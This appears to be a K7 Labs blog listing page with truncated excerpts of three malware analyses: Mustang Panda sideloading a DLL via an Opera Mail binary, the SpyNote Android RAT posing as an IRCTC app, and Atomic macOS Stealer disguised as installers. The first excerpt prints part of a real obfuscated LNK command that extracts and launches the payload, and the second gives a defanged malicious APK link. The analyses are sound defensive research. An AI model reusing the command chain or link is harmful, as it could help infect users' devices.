K7 Antivirus

We came across a tweet where Mustang Panda APT abuses an Opera Mail binary to sideload a malicious dll and then inject malicious code into an mshta.exe process. Initial vector for this infection chain is a .rar file named as lydwcb.rar1, which contains a crafted LNK file that is named “2023 03 26 Vonulásos gyűlés — Körjegyzék” which translates to ‘March meeting — Circular list’. It mimics a shortcut to a PDF to deceive users. The lnk file has a size of around 8KB, in the properties view we can see cmd.exe in the target path. Only upto 255 bytes of content can be viewed in the target path. The actual content can be seen in the below image. “ /c bdeuri&bootstart&cmd /c ___\ ##\___\##\operamail.exe||(forfiles /^P %USERPROFILE%\ /S /^M "2023 03 26 Vonulásos gyűlés - Körjegyzék.rar" /C "cmd /^c &iDj&cmd /c (c:\progra~1\wi^nrar\winr^ar x -id -o+ @path ||pfUY||c:\progra~2\winr^ar\winra^r x -id -o+ @path ||c:\progra~1\7-Zip\7^z x -y -aoa @path ||fBF||c:\progra~2\...

  SpyNote targets IRCTC users We at K7 Labs, recently came across an email message as shown in Figure 1, from Indian Railway Catering and Tourism Corporation (IRCTC) about SpyNote , an Android RAT targeting IRCTC users. This spyware is not only used to steal users’ sensitive information but can also spy on a user’s location or remotely control the victims’ device. Let’s now get into the details of how this SpyNote works. This RAT is propagated via WhatsApp with the malicious link https://irctc[.]creditmobile[.]site/irctcconnect[.]apk Once the user falls prey to this RAT and installs this malicious “irctcconnect.apk”, this app pretends to be the genuine IRCTC icon in the device app drawer as shown in Figure 2. Once this RAT is installed on the device, it frequently brings up the Accessibility Service setting option on the device, as shown in Figure 3, until the user eventually allows this app to have the Accessibility Service enabled. Technical Analysis With the necessary perm...

  In the last week of April 2023, it was reported on twitter , that through a telegram channel a new malware was being offered as “Atomic MacOS Stealer”. Many samples of this malware were found on the internet. Figure 1 – Atomic MacOS Stealer Most of these samples were masquerading as an installer of various applications like Tor browser, Photoshop CC, Notion, FL studio. Figure 2 – Amos DMGfiles masquerading as different applications These are delivered as a DMGfile(Disk Image) which is the common format for software distribution & installation packages on macOS. We identified the Tor browser DMG file for the analysis. When we execute the DMG file it gets mounted and we can see the resulting window advises the user to execute the application by right clicking. Figure 3 – Tor Browser These fake applications are created by using Appify , which is used to create applications just by having the executable alone. The icons can be customised. That’s why these applications are in dif...